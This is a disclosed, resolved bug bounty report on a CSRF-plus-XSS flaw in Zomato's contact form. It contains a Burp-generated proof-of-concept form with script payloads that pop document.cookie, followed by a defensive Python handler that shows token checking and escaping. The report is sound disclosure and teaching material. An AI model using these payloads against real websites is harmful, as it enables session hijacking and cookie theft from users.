XSS and CSRF in Zomato Contact form

Disclosed: 2016-05-24 09:20:47 By vibs123i To zomato
Vulnerability Details
URL affected: https://www.zomato.com/contact

CSRF Payload:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="https://www.zomato.com/contact" method="POST">
          <input type="hidden" name="csrf&#95;token" value="fa53b2d4ea3ae0113d903ed5b0200fcb" />
          <input type="hidden" name="name" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
          <input type="hidden" name="email" value="vibhuti123i&quot;&gt;&lt;script&#32;&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;" />
          <input type="hidden" name="phone" value="" />
          <input type="hidden" name="message" value="retrryrty" />
          <input type="hidden" name="submit" value="Submit" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

Steps to Reproduce:

1) I have tested it after login and without login. This CSRF worked, executing XSS, due to CSRF in the Contact form. It is tested in the latest Firefox browser.
2) Just run the above payload and you will find the below image: XSS executed, popping up cookies.
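As an added defender's example (not part of the report and not Zomato's code), the Python below shows a minimal contact-form handler that binds the CSRF token to the server-side session, so a fixed token like the one embedded in the PoC is rejected, and HTML-escapes every submitted field before echoing it back, so the script tags in the name and email values render as text. The field names follow the PoC; the session dictionary and handler function are assumptions.

```python
import hmac
import html
import secrets

# Contact form fields from the PoC (csrf_token handled separately).
FIELDS = ("name", "email", "phone", "message")


def issue_csrf_token(session):
    """Mint a fresh per-session token and store it server-side (assumed session dict)."""
    session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]


def csrf_token_valid(session, submitted):
    """Valid only if the session holds a token and it matches in constant time."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_contact(session, form):
    """Return (HTTP status, HTML echoed to the user) for one POST to /contact."""
    if not csrf_token_valid(session, form.get("csrf_token", "")):
        return 403, "<p>Invalid or missing CSRF token.</p>"
    # Escape every user-supplied value before it is placed in HTML,
    # including quotes, so the email payload cannot break out of an attribute.
    safe = {f: html.escape(form.get(f, ""), quote=True) for f in FIELDS}
    body = "<p>Thanks, {name} ({email}). We received: {message}</p>".format(**safe)
    return 200, body


# Constructed sample: the decoded field values from the PoC above.
POC_FORM = {
    "csrf_token": "fa53b2d4ea3ae0113d903ed5b0200fcb",
    "name": "<script>alert(1)</script>",
    "email": 'vibhuti123i"><script >alert(document.cookie)</script>',
    "phone": "",
    "message": "retrryrty",
}

if __name__ == "__main__":
    victim = {}
    issue_csrf_token(victim)
    print(handle_contact(victim, POC_FORM))       # 403: the attacker's fixed token never matches
    legit = dict(POC_FORM, csrf_token=victim["csrf_token"])
    print(handle_contact(victim, legit))          # 200, with the script tags escaped
```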
Report Stats
  • Report ID: 115248
  • State: Closed
  • Substate: resolved
  • Upvotes: 1